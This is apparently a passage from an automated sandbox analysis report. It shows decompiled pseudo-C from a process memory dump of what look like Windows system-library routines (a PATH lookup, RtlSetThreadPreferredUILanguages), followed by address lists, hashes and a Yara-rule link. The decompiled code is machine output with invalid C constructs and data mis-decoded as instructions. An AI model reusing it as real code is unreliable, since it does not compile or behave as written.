								_t334 = _t334 + (( *_t321 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t285 = E018A39F2(_t334);
									_t321 = _v32;
									_t334 = _t285;
								}
							}
							_t304 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t340 = _v68;
								__eflags = 0;
								 *((short*)(_t334 - 2)) = 0;
								goto L32;
							} else {
								_t295 = _t339 + _t293 * 4;
								_v56 = _t295;
								do {
									__eflags = _t321;
									if(_t321 != 0) {
										_t252 =  *(_v60 + _t304 * 4);
										__eflags = _t252;
										if(_t252 == 0) {
											goto L30;
										} else {
											__eflags = _t252 == 5;
											if(_t252 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t295 =  *(_v60 + _t304 * 4);
										 *(_t295 + 0x18) = _t334;
										_t256 =  *(_v60 + _t304 * 4);
										__eflags = _t256 - 8;
										if(_t256 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t256 * 4 +  &M01842959))) {
												case 0:
													__ax =  *0x1908488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0185F3E0(__edi,  *0x190848c, __ax & 0x0000ffff);
														__eax =  *0x1908488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0185F3E0(_t334, _v80, _v64);
													_t280 = _v64;
													goto L26;
												case 2:
													 *0x1908480 & 0x0000ffff = E0185F3E0(__edi,  *0x1908484,  *0x1908480 & 0x0000ffff);
													__eax =  *0x1908480 & 0x0000ffff;
													__eax = ( *0x1908480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0185F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0185F3E0(_t334, _v76, _v36);
														_t280 = _v36;
													}
													L26:
													_t350 = _t350 + 0xc;
													_t334 = _t334 + (_t280 >> 1) * 2 + 2;
													__eflags = _t334;
													L27:
													_push(0x3b);
													_pop(_t282);
													 *((short*)(_t334 - 2)) = _t282;
													goto L28;
												case 6:
													__ebx =  *0x190575c;
													__eflags = __ebx - 0x190575c;
													if(__ebx != 0x190575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0185F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x190575c;
														} while (__ebx != 0x190575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1908478 & 0x0000ffff = E0185F3E0(__edi,  *0x190847c,  *0x1908478 & 0x0000ffff);
													__eax =  *0x1908478 & 0x0000ffff;
													__eax = ( *0x1908478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E018A39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1906e58 & 0x0000ffff = E0185F3E0(__edi,  *0x1906e5c,  *0x1906e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1906e58 & 0x0000ffff;
													__eax = ( *0x1906e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t304 = _v16;
													_t321 = _v32;
													L29:
													_t295 = _t295 + 4;
													__eflags = _t295;
													_v56 = _t295;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t304 = _t304 + 1;
									_v16 = _t304;
									__eflags = _t304 - _v48;
								} while (_t304 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t256 =  *(_v60 + _t332 * 4);
						if(_t256 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t256 * 4 +  &M01842935))) {
							case 0:
								__ax =  *0x1908488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t321 =  &_v64;
								_v80 = E01842E3E(0,  &_v64);
								_t291 = _t291 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1908480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1908480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0182EEF0(0x19079a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0182EB70(__ecx, 0x19079a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t230 = _v72;
											__eflags = _t230;
											if(_t230 != 0) {
												L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t230);
											}
											_t231 = _v52;
											__eflags = _t231;
											if(_t231 != 0) {
												__eflags = _t340;
												if(_t340 < 0) {
													L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t231);
													_t231 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t300 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1907b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01834620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0182EB70(__ecx, 0x19079a0);
										__eax = _v52;
										L36:
										_pop(_t333);
										_pop(_t341);
										__eflags = _v8 ^ _t346;
										_pop(_t292);
										return E0185B640(_t231, _t292, _v8 ^ _t346, _t321, _t333, _t341);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t287 = _v56;
								if(_v56 != 0) {
									_t321 =  &_v36;
									_t289 = E01842E3E(_t287,  &_v36);
									_t300 = _v36;
									_v76 = _t289;
								}
								if(_t300 == 0) {
									goto L44;
								} else {
									_t291 = _t291 + 2 + _t300;
								}
								goto L14;
							case 6:
								__eax =  *0x1905764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1908478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1908478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1906e58 & 0x0000ffff;
								__eax = ( *0x1906e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t332 = _t332 + 1;
								if(_t332 >= _v48) {
									goto L16;
								} else {
									_t321 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t305 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					__eflags =  *_t305 & _t256;
					asm("o16 sub [ecx+eax+0x18427e0], al");
					__eflags =  *[es:ecx] & _t256;
					_t342 = _t339 + 1;
					 *((intOrPtr*)(_t305 + _t256 + 0x1842605)) =  *((intOrPtr*)(_t305 + _t256 + 0x1842605)) - _t256;
					_pop(ds);
					_pop(_t296);
					 *_t305 = _t256;
					_t257 = _t350;
					_t352 = _t256;
					 *((intOrPtr*)(_t305 + _t257 + 0x1885b35)) =  *((intOrPtr*)(_t305 + _t257 + 0x1885b35)) - _t257;
					_t306 = _t305 +  *_t305;
					__eflags =  *_t306 & _t257;
					 *_t257 =  *_t257 - 0x84;
					_t343 = _t339 + 1 + _t342;
					asm("daa");
					__eflags =  *_t306 & _t257;
					_push(ds);
					 *((intOrPtr*)(_t306 + _t257 + 0x184284e)) =  *((intOrPtr*)(_t306 + _t257 + 0x184284e)) - _t257;
					asm("daa");
					__eflags =  *_t306 & _t257;
					asm("fcomp dword [ebx-0x78]");
					 *((intOrPtr*)(_t257 +  &_a1546912128)) =  *((intOrPtr*)(_t257 +  &_a1546912128)) + _t339 + 1 + _t342;
					 *_t306 = _t257;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x18eff00);
					E0186D08C(_t296, _t334, _t343);
					_v44 =  *[fs:0x18];
					_t335 = 0;
					 *_a24 = 0;
					_t297 = _a12;
					__eflags = _t297;
					if(_t297 == 0) {
						_t260 = 0xc0000100;
					} else {
						_v8 = 0;
						_t344 = 0xc0000100;
						_v52 = 0xc0000100;
						_t262 = 4;
						while(1) {
							_v40 = _t262;
							__eflags = _t262;
							if(_t262 == 0) {
								break;
							}
							_t311 = _t262 * 0xc;
							_v48 = _t311;
							__eflags = _t297 -  *((intOrPtr*)(_t311 + 0x17f1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t277 = E0185E5C0(_a8,  *((intOrPtr*)(_t311 + 0x17f1668)), _t297);
									_t352 = _t352 + 0xc;
									__eflags = _t277;
									if(__eflags == 0) {
										_t344 = E018951BE(_t297,  *((intOrPtr*)(_v48 + 0x17f166c)), _a16, _t335, _t344, __eflags, _a20, _a24);
										_v52 = _t344;
										break;
									} else {
										_t262 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t262 = _t262 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t344;
						__eflags = _t344;
						if(_t344 < 0) {
							__eflags = _t344 - 0xc0000100;
							if(_t344 == 0xc0000100) {
								_t307 = _a4;
								__eflags = _t307;
								if(_t307 != 0) {
									_v36 = _t307;
									__eflags =  *_t307 - _t335;
									if( *_t307 == _t335) {
										_t344 = 0xc0000100;
										goto L76;
									} else {
										_t323 =  *((intOrPtr*)(_v44 + 0x30));
										_t264 =  *((intOrPtr*)(_t323 + 0x10));
										__eflags =  *((intOrPtr*)(_t264 + 0x48)) - _t307;
										if( *((intOrPtr*)(_t264 + 0x48)) == _t307) {
											__eflags =  *(_t323 + 0x1c);
											if( *(_t323 + 0x1c) == 0) {
												L106:
												_t344 = E01842AE4( &_v36, _a8, _t297, _a16, _a20, _a24);
												_v32 = _t344;
												__eflags = _t344 - 0xc0000100;
												if(_t344 != 0xc0000100) {
													goto L69;
												} else {
													_t335 = 1;
													_t307 = _v36;
													goto L75;
												}
											} else {
												_t267 = E01826600( *(_t323 + 0x1c));
												__eflags = _t267;
												if(_t267 != 0) {
													goto L106;
												} else {
													_t307 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t344 = E01842C50(_t307, _a8, _t297, _a16, _a20, _a24, _t335);
											L76:
											_v32 = _t344;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0182EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t344 = _a24;
									_t274 = E01842AE4( &_v36, _a8, _t297, _a16, _a20, _t344);
									_v32 = _t274;
									__eflags = _t274 - 0xc0000100;
									if(_t274 == 0xc0000100) {
										_v32 = E01842C50(_v36, _a8, _t297, _a16, _a20, _t344, 1);
									}
									_v8 = _t335;
									E01842ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t260 = _t344;
					}
					L70:
					return E0186D0D1(_t260);
				}
				L108:
			}

0x01842584
0x01842586
0x01842590
0x01842596
0x01842597
0x01842598
0x01842599
0x0184259e
0x018425a4
0x018425a9
0x018425ac
0x018425ae
0x018425b1
0x018425b2
0x018425b5
0x018425b8
0x018425bb
0x018425bc
0x018425bf
0x018425c2
0x018425c5
0x018425c6
0x018425cb
0x018425ce
0x018425d8
0x018425db
0x018425dd
0x018425de
0x018425e1
0x018425e3
0x018425e9
0x018426da
0x018426da
0x018426dd
0x018426e2
0x01885b56
0x00000000
0x018426e8
0x018426f9
0x018426fb
0x018426fe
0x01842700
0x01885b60
0x00000000
0x01842706
0x01842706
0x0184270a
0x0184270a
0x0184270d
0x01842713
0x01842716
0x01842718
0x0184271c
0x0184271e
0x01885b6c
0x01885b6f
0x01885b7f
0x01885b89
0x01885b8e
0x01885b93
0x01885b96
0x01885b9c
0x01885ba0
0x01885ba3
0x01885bab
0x01885bb0
0x01885bb3
0x01885bb3
0x01885ba3
0x01842724
0x01842726
0x01842729
0x0184272c
0x0184279d
0x0184279d
0x018427a0
0x018427a2
0x00000000
0x0184272e
0x0184272e
0x01842731
0x01842734
0x01842734
0x01842736
0x01885bc1
0x01885bc1
0x01885bc4
0x00000000
0x01885bca
0x01885bca
0x01885bcd
0x00000000
0x01885bd3
0x00000000
0x01885bd3
0x01885bcd
0x0184273c
0x0184273c
0x01842742
0x01842747
0x0184274a
0x0184274d
0x01842750
0x00000000
0x01842756
0x01842756
0x00000000
0x01842902
0x01842908
0x0184290b
0x00000000
0x01842911
0x0184291c
0x01842921
0x00000000
0x01842921
0x00000000
0x00000000
0x01842880
0x01842887
0x0184288c
0x00000000
0x00000000
0x01842805
0x0184280a
0x01842814
0x01842816
0x00000000
0x00000000
0x0184281e
0x01842821
0x01842823
0x00000000
0x01842829
0x01842829
0x01842831
0x0184283c
0x0184283e
0x00000000
0x0184283e
0x00000000
0x00000000
0x0184284e
0x01842850
0x01842851
0x01842854
0x01842857
0x0184285a
0x0184285c
0x0184285d
0x00000000
0x00000000
0x0184275d
0x01842761
0x00000000
0x01842767
0x0184276e
0x01842773
0x01842773
0x01842776
0x01842778
0x0184277e
0x0184277e
0x01842781
0x01842781
0x01842783
0x01842784
0x00000000
0x00000000
0x01885bd8
0x01885bde
0x01885be4
0x01885be6
0x01885be8
0x01885be9
0x01885bee
0x01885bf8
0x01885bff
0x01885c01
0x01885c04
0x01885c07
0x01885c0b
0x01885c0d
0x01885c0d
0x01885c15
0x01885c18
0x01885c1b
0x01885c1b
0x01885c1e
0x00000000
0x00000000
0x018428c3
0x018428c8
0x018428d2
0x018428d4
0x018428d8
0x018428db
0x01885c26
0x01885c28
0x01885c2d
0x01885c2d
0x00000000
0x00000000
0x01885c34
0x01885c36
0x01885c49
0x01885c4e
0x01885c54
0x01885c5b
0x01885c5d
0x01885c60
0x01842788
0x01842788
0x0184278b
0x0184278e
0x0184278e
0x0184278e
0x01842791
0x00000000
0x00000000
0x01842756
0x01842750
0x00000000
0x01842794
0x01842794
0x01842795
0x01842798
0x01842798
0x00000000
0x01842734
0x0184272c
0x01842700
0x018425ef
0x018425ef
0x018425ef
0x018425f2
0x018425f8
0x00000000
0x00000000
0x018425fe
0x00000000
0x018428e6
0x018428ec
0x018428ef
0x018428f5
0x018428f8
0x018428f8
0x00000000
0x018428f8
0x00000000
0x00000000
0x01842866
0x01842866
0x01842876
0x01842879
0x00000000
0x00000000
0x018427e0
0x018427e7
0x018427e9
0x018427eb
0x01885afd
0x00000000
0x01885afd
0x00000000
0x00000000
0x01842633
0x01842638
0x0184263b
0x0184263c
0x0184263e
0x01842640
0x01842642
0x01842647
0x01842649
0x0184264e
0x01842650
0x01842653
0x01842659
0x018426a2
0x018426a7
0x018426ac
0x018426b2
0x01885b11
0x01885b15
0x01885b17
0x00000000
0x018426b8
0x018426b8
0x018426ba
0x018427a6
0x018427a6
0x018427a9
0x018427ab
0x018427b9
0x018427b9
0x018427be
0x018427c1
0x018427c3
0x018427c5
0x018427c7
0x01885c74
0x01885c79
0x01885c79
0x018427c7
0x00000000
0x018426c0
0x018426c0
0x018426c3
0x018426c6
0x018426c6
0x018426c9
0x018426c9
0x00000000
0x018426c9
0x018426ba
0x0184265b
0x0184265b
0x0184265e
0x01842667
0x0184266d
0x01842677
0x0184267c
0x0184267f
0x01842681
0x01885b49
0x01885b4e
0x018427cd
0x018427d0
0x018427d1
0x018427d2
0x018427d4
0x018427dd
0x01842687
0x01842687
0x0184268a
0x0184268b
0x0184268e
0x0184268f
0x01842691
0x01842696
0x01842698
0x0184269d
0x0184269f
0x00000000
0x0184269f
0x01842681
0x00000000
0x00000000
0x01842846
0x00000000
0x00000000
0x01842605
0x0184260a
0x0184260c
0x01842611
0x01842616
0x01842619
0x01842619
0x0184261e
0x00000000
0x01842624
0x01842627
0x01842627
0x00000000
0x00000000
0x01885b1f
0x00000000
0x00000000
0x01842894
0x0184289b
0x0184289d
0x018428a1
0x01885b2b
0x01885b2e
0x01885b2e
0x018428a7
0x018428a9
0x01885b04
0x01885b09
0x01885b09
0x01885b09
0x00000000
0x00000000
0x01885b35
0x01885b3c
0x018428fb
0x018428fb
0x018426cc
0x018426cc
0x018426d0
0x00000000
0x018426d2
0x018426d2
0x00000000
0x018426d2
0x00000000
0x00000000
0x018425fe
0x0184292d
0x0184292f
0x01842930
0x01842935
0x01842937
0x01842939
0x01842941
0x01842945
0x01842946
0x0184294d
0x0184294e
0x0184294f
0x01842951
0x01842951
0x01842952
0x01842959
0x0184295b
0x0184295d
0x01842960
0x01842962
0x01842963
0x01842965
0x01842966
0x0184296e
0x0184296f
0x01842971
0x01842974
0x0184297b
0x0184297d
0x0184297e
0x0184297f
0x01842980
0x01842981
0x01842982
0x01842983
0x01842984
0x01842985
0x01842986
0x01842987
0x01842988
0x01842989
0x0184298a
0x0184298b
0x0184298c
0x0184298d
0x0184298e
0x0184298f
0x01842990
0x01842992
0x01842997
0x018429a3
0x018429a6
0x018429ab
0x018429ad
0x018429b0
0x018429b2
0x01885c80
0x018429b8
0x018429b8
0x018429bb
0x018429c0
0x018429c5
0x018429c6
0x018429c6
0x018429c9
0x018429cb
0x00000000
0x00000000
0x018429cd
0x018429d0
0x018429d9
0x018429db
0x018429dd
0x01842a7f
0x01842a84
0x01842a87
0x01842a89
0x01885ca1
0x01885ca3
0x00000000
0x01842a8f
0x01842a8f
0x00000000
0x01842a8f
0x00000000
0x018429e3
0x018429e3
0x018429e3
0x00000000
0x018429e3
0x018429dd
0x00000000
0x018429db
0x018429e6
0x018429e9
0x018429eb
0x018429ed
0x018429f3
0x018429f5
0x018429f8
0x018429fa
0x01842a97
0x01842a9a
0x01842a9d
0x01842add
0x00000000
0x01842a9f
0x01842aa2
0x01842aa5
0x01842aa8
0x01842aab
0x01885cab
0x01885caf
0x01885cc5
0x01885cda
0x01885cdc
0x01885cdf
0x01885ce5
0x00000000
0x01885ceb
0x01885ced
0x01885cee
0x00000000
0x01885cee
0x01885cb1
0x01885cb4
0x01885cb9
0x01885cbb
0x00000000
0x01885cbd
0x01885cbd
0x00000000
0x01885cbd
0x01885cbb
0x01842ab1
0x01842ab1
0x01842ac4
0x01842ac6
0x01842ac6
0x00000000
0x01842ac6
0x01842aab
0x00000000
0x01842a00
0x01842a09
0x01842a0e
0x01842a21
0x01842a24
0x01842a35
0x01842a3a
0x01842a3d
0x01842a42
0x01842a59
0x01842a59
0x01842a5c
0x01842a5f
0x01842a5f
0x018429fa
0x018429f3
0x01842a64
0x01842a64
0x01842a6b
0x01842a6b
0x01842a6d
0x01842a72
0x01842a72
0x00000000

Strings

PATH, xrefs: 01842642, 01842691

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 511912d3bd096d72e2249f8c22d9c246448ec97a507fcea72f663bff623dd292
Instruction ID: 6186d2420aa09278c2e4aa7909073c6d88e81df4b4f422c3c40f5cae4b7f7a7e
Opcode Fuzzy Hash: 511912d3bd096d72e2249f8c22d9c246448ec97a507fcea72f663bff623dd292
Instruction Fuzzy Hash: 78C17F75E0421DDFDB25DF99E880AADBBB2FF58754F044029F901EB250DB34AA41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0184FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0184FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0182EEF0(0x1907b60);
					_t134 =  *0x1907b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1907b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1907b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01826D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E018276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E018B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0181B150();
													}
													_t116 = E018B6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E018275CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1908638; // 0x0
																	_t122 = L018238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E018276E2(_t154);
																			goto L41;
																		}
																	} else {
																		E018276E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0184FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L018270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0184FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0184FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0184FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0184FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0184FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
